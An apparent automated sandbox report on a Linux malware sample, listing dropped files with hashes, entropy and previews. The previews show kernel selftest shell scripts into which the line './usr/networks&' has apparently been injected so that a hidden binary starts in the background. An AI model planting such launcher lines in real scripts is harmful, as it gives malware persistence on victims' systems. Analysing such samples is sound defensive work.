                                                                  Preview:./usr/networks&..exit 0.fi.set -e..ip netns add ns1.ip netns add ns2..trap cleanup 0 2 3 6 9..ip link add veth1 type veth peer name veth2..ip link set veth1 netns ns1.ip link set veth2 netns ns2..ip netns exec ns1 ip addr add 10.1.1.11/24 dev veth1.ip netns exec ns2 ip addr add 10.1.1.22/24 dev veth2..ip netns exec ns1 tc qdisc add dev veth1 clsact.ip netns exec ns2 tc qdisc add dev veth2 clsact..ip netns exec ns1 tc filter add dev veth1 ingress bpf da obj test_xdp_meta.o sec t.ip netns exec ns2 tc filter add dev veth2 ingress bpf da obj test_xdp_meta.o sec t..ip netns exec ns1 ip link set dev veth1 xdp obj test_xdp_meta.o sec x.ip netns exec ns2 ip link set dev veth2 xdp obj test_xdp_meta.o sec x..ip netns exec ns1 ip link set dev veth1 up.ip netns exec ns2 ip link set dev veth2 up..ip netns exec ns1 ping -c 1 10.1.1.22.ip netns exec ns2 ping -c 1 10.1.1.11..exit 0../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):767
                                                                  Entropy (8bit):4.374876194795111
                                                                  Encrypted:false
                                                                  SSDEEP:12:xqgzdQEeTrFVrFrJZrWZoJOW84q3fQoc7QwMRMZQLP4OQ5EBe8K4n:oEOzNFdoooc8P1LPo5EYb4
                                                                  MD5:3FBEA0F5A3A44C38DE78FA04A8F20F4C
                                                                  SHA1:DF6CAEBDC0B41681A8D9F6EB93A57170E491CF0F
                                                                  SHA-256:4F9AF779F4D8072518504184058911B20A557043C48EC5A305AEF58A298ABDE5
                                                                  SHA-512:F7F4EF184A07ADAF93216546B6172835E3E67DE788B3330C1F6B3E3CB2840CFD41EB226267FC4EE6A0FBD872FE1B43439770F156417DC42220B54B3295FA5293
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 0.fi.set -e..ip netns add ns1.ip netns add ns2..trap cleanup 0 2 3 6 9..ip link add veth1 index 111 type veth peer name veth11.ip link add veth2 index 222 type veth peer name veth22..ip link set veth11 netns ns1.ip link set veth22 netns ns2..ip link set veth1 up.ip link set veth2 up..ip netns exec ns1 ip addr add 10.1.1.11/24 dev veth11.ip netns exec ns2 ip addr add 10.1.1.22/24 dev veth22..ip netns exec ns1 ip link set dev veth11 up.ip netns exec ns2 ip link set dev veth22 up..ip link set dev veth1 xdpgeneric obj test_xdp_redirect.o sec redirect_to_222.ip link set dev veth2 xdpgeneric obj test_xdp_redirect.o sec redirect_to_111..ip netns exec ns1 ping -c 1 10.1.1.22.ip netns exec ns2 ping -c 1 10.1.1.11..exit 0../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):2423
                                                                  Entropy (8bit):5.128034697458766
                                                                  Encrypted:false
                                                                  SSDEEP:48:KNfi7s/PHSdG16qZuH8Pa5yOU4I3dfa6E7vc45SWs:K5ZydWoH8P6pwfvE7vccSWs
                                                                  MD5:1B96D7C2944C0FE933D088AEA9AD7E46
                                                                  SHA1:ACB6C2FE43224F93E4C4624D2E12D7C8408D2055
                                                                  SHA-256:7A429BC65F7DD3FFF35DC43515956C5800AB1225F8A57B114563EEB7DA391EFE
                                                                  SHA-512:40EEAE893DDAB845EB650662E4BF29BB7946881CEEB08A9ABA126B44ABE6590D2355593948F99E938B838F896E0801278563241DA15909FF48352BCAFBDBE608
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.BPF_FS=$(awk '$3 == "bpf" {print $2; exit}' /proc/mounts).BPF_DIR=$BPF_FS/test_$TESTNAME.._cleanup().{..set +e..ip link del veth1 2> /dev/null..ip link del veth2 2> /dev/null..ip link del veth3 2> /dev/null..ip netns del ns1 2> /dev/null..ip netns del ns2 2> /dev/null..ip netns del ns3 2> /dev/null..rm -rf $BPF_DIR 2> /dev/null.}..cleanup_skip().{..echo "selftests: $TESTNAME [SKIP]".._cleanup...exit $ksft_skip.}..cleanup().{..if [ "$?" = 0 ]; then...echo "selftests: $TESTNAME [PASS]"..else...echo "selftests: $TESTNAME [FAILED]"..fi.._cleanup.}..if [ $(id -u) -ne 0 ]; then..echo "selftests: $TESTNAME [SKIP] Need root privileges"..exit $ksft_skip.fi..if ! ip link set dev lo xdp off > /dev/null 2>&1; then..echo "selftests: $TESTNAME [SKIP] Could not run test without the ip xdp support"..exit $ksft_skip.fi..if [ -z "$BPF_FS" ]; then..echo "selftests: $TESTNAME [SKIP] Could not run test without bpffs mounted"..exit $ksft_skip.fi..if ! bpftool version > /dev/null 2>&1; then..
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):4755
                                                                  Entropy (8bit):5.148825786731255
                                                                  Encrypted:false
                                                                  SSDEEP:96:zOaoILqMju/udWB40aU10oi8JWAiWRRCQP+SR0XcyM5c72lCSgy4Y7:zTLLqMKd4tUqoi8NmHNslCNNY7
                                                                  MD5:C179F5E1062459B06C0F899FEFDB2B3B
                                                                  SHA1:6832CAFFD1D52F776101A94E5A5CC4DBC95D4AFC
                                                                  SHA-256:E81E5F5A8C27722A58E154B9493D3F26B954E81C46EC14AD106DEE90A5F42962
                                                                  SHA-512:4EDF18741DCB3763602A90980C024DFA6044864AE2BA64742F6F8C4EF8AE39334BFDBE99E6296EDF7EFACFEAADA5F86B499A1FAC9C8C847738F19C908524CFC4
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit $status..fi...set +e..ip link del veth1 2> /dev/null..ip netns del ns1 2> /dev/null..ip netns del ns2 2> /dev/null.}..# Using external program "getopt" to get --long-options.OPTIONS=$(getopt -o hvfi: \. --long verbose,flush,help,interactive,debug,mode: -- "$@").if (( $? != 0 )); then. usage. echo "selftests: $TESTNAME [FAILED] Error calling getopt, unknown option?". exit 2.fi.eval set -- "$OPTIONS"..## --- Parse command line arguments / parameters ---.while true; do..case "$1" in.. -v | --verbose)...export VERBOSE=yes...shift...;;.. -i | --interactive | --debug )...INTERACTIVE=yes...shift...;;.. -f | --flush )...cleanup...shift...;;.. --mode )...shift...XDP_MODE=$1...shift...;;.. -- )...shift...break...;;.. -h | --help )...usage;...echo "selftests: $TESTNAME [SKIP] usage help info requested"...exit 0...;;.. * )...shift...break...;;..esac.done..if [ "$EUID" -ne 0 ]; then..echo "selftests: $TESTNAME [FAILED] need root privileges"..
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):46
                                                                  Entropy (8bit):3.925523369006428
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                  MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                  SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                  SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                  SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):995
                                                                  Entropy (8bit):4.928718603247161
                                                                  Encrypted:false
                                                                  SSDEEP:24:aPLPH+uFgWHLTEoozooHFFMF8kL2nfkvUdyXwRx7:aPLPeKgqH3oMoMF8kL2MvUT
                                                                  MD5:973C7E7EF2911945AA49402DCFBB1627
                                                                  SHA1:DE36D342A11EFF124B62EF56DE2728672F473562
                                                                  SHA-256:3B0F9186CC564F480FAAE9E0D192EA887FDFAC05C6036CC776CB0F730D66D381
                                                                  SHA-512:AE92957D9E517ACF95DF2F4878A7F8F07ACB9EFB6E7647F9B7D08F68CE895BE0B34424BA16C2F96D5AC04D64D4C133285D00E501171ECFA5082D8B97177E13E0
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. exit 1.}..setup() {. ip -6 addr add "${V6_INNER}" dev lo || fail 'failed to setup v6 address'. ip -4 addr add "${V4_INNER}" dev lo || fail 'failed to setup v4 address'.. if [[ -n "${V6_SIT}" ]]; then. ip link add "${SIT_DEV_NAME}" type sit remote any local any \.. || fail 'failed to add sit'. ip link set dev "${SIT_DEV_NAME}" up \.. || fail 'failed to bring sit device up'. ip -6 addr add "${V6_SIT}" dev "${SIT_DEV_NAME}" \.. || fail 'failed to setup v6 SIT address'. ip -4 addr add "${V4_SIT}" dev "${SIT_DEV_NAME}" \.. || fail 'failed to setup v4 SIT address'. fi.. sleep 2.# avoid race causing bind to fail.}..cleanup() {. if [[ -n "${V6_SIT}" ]]; then. ip -4 addr del "${V4_SIT}" dev "${SIT_DEV_NAME}". ip -6 addr del "${V6_SIT}" dev "${SIT_DEV_NAME}". ip link del "${SIT_DEV_NAME}". fi.. ip -4 addr del "${V4_INNER}" dev lo. ip -6 addr del "${V6_INNER}" dev lo.}..trap cleanup EXIT..setup."$@".exit "$?"../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):49
                                                                  Entropy (8bit):4.073694027700372
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORjusVOORgn:Hn
                                                                  MD5:8BB6EDFFB7B315BB004E723523112C7C
                                                                  SHA1:28AE6BC189D31C09263C661FE1F657ACC53FA62F
                                                                  SHA-256:83D6A5A6B4BA19B9F6783B95D420A9B62DF61A7AC1D1725C0C580422C30BE4F5
                                                                  SHA-512:6A410CF23E3B40168C11641FC28440F23A966EB0069A737806885A7E1AB152A3D75CA34EB06E347926EB504842AB28E500AAC0429D3CBFCC9E1785CCF5C8E5AD
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit "$?"../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):5594
                                                                  Entropy (8bit):5.230978388733242
                                                                  Encrypted:false
                                                                  SSDEEP:96:oaS6S51Xx4JG/0gEvJ0C22I5B7TyFn/cH:5SrIG9EvwJ7TyFn/cH
                                                                  MD5:472C1D8107D68470FAEE126A96AEF61B
                                                                  SHA1:16CED932ABCE5F22426C12309CB1D2610916B167
                                                                  SHA-256:0910E28F5BF31A72930DA1F147C0A4343ECE41564566C42A5BCB0C76DA503D67
                                                                  SHA-512:CE71ECFAA8194C16FB55B42DECCBD22D53FB5C675E7CCDAE3FE8A6348440C7FE94EE8458AAA8EC7C49D4C95D907B50C0338AC21C6EAA337DA3D6B3F1CA003FD5
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit $ksft_skip..fi...taskset -p 01 $$...SYSFS=`mount -t sysfs | head -1 | awk '{ print $3 }'`...if [ ! -d "$SYSFS" ]; then...echo $msg sysfs is not mounted >&2...exit $ksft_skip..fi...if ! ls $SYSFS/devices/system/cpu/cpu* > /dev/null 2>&1; then...echo $msg cpu hotplug is not supported >&2...exit $ksft_skip..fi...echo "CPU online/offline summary:"..online_cpus=`cat $SYSFS/devices/system/cpu/online`..online_max=${online_cpus##*-}...if [[ "$online_cpus" = "$online_max" ]]; then...echo "$msg: since there is only one cpu: $online_cpus"...exit $ksft_skip..fi...present_cpus=`cat $SYSFS/devices/system/cpu/present`..present_max=${present_cpus##*-}..echo "present_cpus = $present_cpus present_max = $present_max"...echo -e "\t Cpus in online state: $online_cpus"...offline_cpus=`cat $SYSFS/devices/system/cpu/offline`..if [[ "a$offline_cpus" = "a" ]]; then...offline_cpus=0..else...offline_max=${offline_cpus##*-}..fi..echo -e "\t Cpus in offline state: $offline_cpus".}..#.# list a
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1369
                                                                  Entropy (8bit):5.048807352649125
                                                                  Encrypted:false
                                                                  SSDEEP:24:AK62FivFFEh1fmiJTimcQQlUscucGExj8raZgcUP5AgQYSWoNUvaGx:d62F8FEnDUqAvE5cRR9do9+
                                                                  MD5:C5A7D35188A9AAF25BEDDA4AEE995EF0
                                                                  SHA1:44AE09FB5696C05961433BC5621D3E4A8BC97B97
                                                                  SHA-256:15C184F5864838DE83D8876AF2F0852C035CF07B49E350B09A0D2E8D54EF3FB4
                                                                  SHA-512:7F329A62D59CB53663D73C72CCE33FD1E8608F5E59A5FA7D55103192D0E14029958378C2FF9A62B38E2A0B254CF3F9F2B9A1321A0B9912F4FC28B83DB4D0A832
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...printf "No cpu is managed by cpufreq core, exiting\n"...exit;..else...printf "CPUFreq manages: $count CPUs\n\n"..fi...# Detect & print which CPUs are not managed by cpufreq..print_unmanaged_cpus...# read/update all cpufreq files..read_all_cpufreq_files..update_all_cpufreq_files...# hotplug cpus..reboot_cpus 5...# Test all frequencies..shuffle_frequency_for_all_cpus 2...# Test all governors..shuffle_governors_for_all_cpus 1.}..# Suspend/resume.# $1: "suspend" or "hibernate", $2: loop count.do_suspend().{..printf "** Test: Running ${FUNCNAME[0]}: Trying $1 for $2 loops **\n\n"...# Is the directory available..if [ ! -d $SYSFS/power/ -o ! -f $SYSFS/power/state ]; then...printf "$SYSFS/power/state not available\n"...return 1..fi...if [ $1 = "suspend" ]; then...filename="mem"..elif [ $1 = "hibernate" ]; then...filename="disk"..else...printf "$1 is not a valid option\n"...return 1..fi...if [ -n $filename ]; then...present=$(cat $SYSFS/power/state | grep $filename)....if [ -z
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):2675
                                                                  Entropy (8bit):5.301400756767313
                                                                  Encrypted:false
                                                                  SSDEEP:48:iaeuwSaSSnAxaL0nvr1dvQNrFsizYhvrCVSD0tlpPjrtyMC1ddctY2zYYA4Vu:FaS6/CcFX0hWHt7fty1pQAGu
                                                                  MD5:BC1F61E4F846CFD9A04893ACCB5CFFA2
                                                                  SHA1:8666AB5AC8731768B4624402D642A9C3DC9D7164
                                                                  SHA-256:230017DA8F33AC1553156CDA07EF1606DB6486FE975E09440E739B7190103ABE
                                                                  SHA-512:FE022DE2F141DAF8F6F52B2EB9F680D0AAAD98A535B0A6F03FACE81A8D9CA027B750E82BCF4C83ADE7848AD4D3B6B915BAEA789D13C39C0BCDFA6F54B0F9ECB2
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 2.}..prerequisite().{..msg="skip all tests:"...if [ $UID != 0 ]; then...echo $msg must be run as root >&2...exit $ksft_skip..fi...taskset -p 01 $$...SYSFS=`mount -t sysfs | head -1 | awk '{ print $3 }'`...if [ ! -d "$SYSFS" ]; then...echo $msg sysfs is not mounted >&2...exit 2..fi...CPUROOT=$SYSFS/devices/system/cpu..CPUFREQROOT="$CPUROOT/cpufreq"...if ! ls $CPUROOT/cpu* > /dev/null 2>&1; then...echo $msg cpus not available in sysfs >&2...exit 2..fi...if ! ls $CPUROOT/cpufreq > /dev/null 2>&1; then...echo $msg cpufreq directory not available in sysfs >&2...exit 2..fi.}..parse_arguments().{..while getopts ht:o:d:g: arg..do...case $arg in....h) # --help.....helpme.....;;.....t) # --func_type (Function to perform: basic, suspend, hibernate, modtest, sptest1/2/3/4 (default: basic)).....FUNC=$OPTARG.....;;.....o) # --output-file (Output file to store dumps).....OUTFILE=$OPTARG.....;;.....d) # --driver-mod-name (Name of the driver module).....DRIVER_MOD=$OPTARG.....;;..
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):4514
                                                                  Entropy (8bit):5.01683672738103
                                                                  Encrypted:false
                                                                  SSDEEP:96:7/VtUWyeZ2qB/Htbuk01FyySFGFilK3NO84rWB/H/U41QekubaVUwWSQH17HE:7//uUHlbu1Pyy2GuK9pxXLQTBSBk
                                                                  MD5:91082C2DCE660B751AF54F31756B587B
                                                                  SHA1:0DF12E3E0017F6881BA78DF8114647B7BF587E2B
                                                                  SHA-256:AB9A80ACB0658F4B232FF4526B865A02283827D07A29C6BFF005454E8688E11B
                                                                  SHA-512:ED999C1E074AB50964AE86B8FB554D63D5CD65BC9CB90966DA64E9ABBA62AAA412E0F5439F852FFAB195EB7CFC080B252C6FD0AE966D8CC593400237758EFF1F
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit;..fi...printf "Removing $1 module\n"..# remove module..rmmod $1..if [ $? != 0 ]; then...printf "rmmod $1 failed\n"...exit;..fi...printf "\n".}..# Insert cpufreq driver module and perform basic tests.# $1: cpufreq-driver module to insert.# $2: If we want to play with CPUs (1) or not (0).module_driver_test_single().{..printf "** Test: Running ${FUNCNAME[0]} for driver $1 and cpus_hotplug=$2 **\n\n"...if [ $2 -eq 1 ]; then...# offline all non-boot CPUs...for_each_non_boot_cpu offline_cpu...printf "\n"..fi...# insert module..printf "Inserting $1 module\n\n"..insmod $1..if [ $? != 0 ]; then...printf "Insmod $1 failed\n"...return;..fi...if [ $2 -eq 1 ]; then...# online all non-boot CPUs...for_each_non_boot_cpu online_cpu...printf "\n"..fi...# run basic tests..cpufreq_basic_tests...# remove module..printf "Removing $1 module\n\n"..rmmod $1..if [ $? != 0 ]; then...printf "rmmod $1 failed\n"...return;..fi...# There shouldn't be any cpufreq directories now...for_each_cpu c
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):237
                                                                  Entropy (8bit):4.471399431089706
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVx7jSHvK3rKCAWRMeFrALlr3rKbVR9MdZe6TykXVwOHYlve6TykXVEQP/NJjUE:a7u26eFUQVHMPHXSOivHXmQPTov6viMn
                                                                  MD5:51DF5BDA7024D54AF97186914CAC65A7
                                                                  SHA1:13E8E320A2DBDC1991456ECEAF7DDBADEC8781AE
                                                                  SHA-256:17CB958D1A6B00FC5878C5E25C7CD90808BCCDCCB8D931402394A1C2E868F2DA
                                                                  SHA-512:94BF0CD487FC8B7244E77C147B778B307ABA90FC8DF5FC35C842C4504F8C5D4A28E0C2E3AA367A34C5B0C2D0F1168393E2969F9D91FF42F7F9DFD3DFCB5AAC7C
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. exit 77.fi..if /sbin/modprobe -q test-drm_mm; then. /sbin/modprobe -q -r test-drm_mm. echo "drivers/gpu/drm_mm: ok".else. echo "drivers/gpu/drm_mm: [FAIL]". exit 1.fi../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):207
                                                                  Entropy (8bit):4.921930769285874
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVa0vK3rKfKFp6pN+R45GrKbVMlQvQaaTypcp4DaTypc6WP4y6viXVOORgn:YLp8unVMlQYaYqaGYq5WPd6viMn
                                                                  MD5:1109E7C1992C5679CF8B73D582594BD6
                                                                  SHA1:B36BECD163CDCD51C5D6B31084320BF59A07CB80
                                                                  SHA-256:6447FC8B6AF85A486DD97842AF8705412FE7C2E3EEBD529E296A740ACB3A7F33
                                                                  SHA-512:FCDD14ADA517AF36EEC9F9B59A905F111A027F4AF550DDBE6474CE9B19AE2868D2E0DE427E8F8328A01CC32AA1815B5E4FEB7967B6F0E1807B3D11135D174394
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 77.fi..if /sbin/modprobe -q i915 mock_selftests=-1; then../sbin/modprobe -q -r i915..echo "drivers/gpu/i915: ok".else..echo "drivers/gpu/i915: [FAIL]"..exit 1.fi../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):124
                                                                  Entropy (8bit):4.633778816869914
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVxJJERGENOFGEwnk9bJjWXVOORgn:aJaGENOddxJjWMn
                                                                  MD5:24F391D61563226193252A631BC07048
                                                                  SHA1:239A891EA619047A812CF830B7EA49AE982D99AF
                                                                  SHA-256:BD78E640A265961860A4189D50EE60C48B02BE882C07193DAAA34001189668A3
                                                                  SHA-512:FF531B342B1C672C44B5EE4F7C34FF95BCF8DBB1C2637A4AF68AD1A07A651A848864AD7B0713E8F00B8B4A278A8988F38B94E7036EC8893E1524CA541E6857E1
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. exit.fi..tcflags="skip_hw".test_sw..tcflags="skip_sw".test_hw..exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
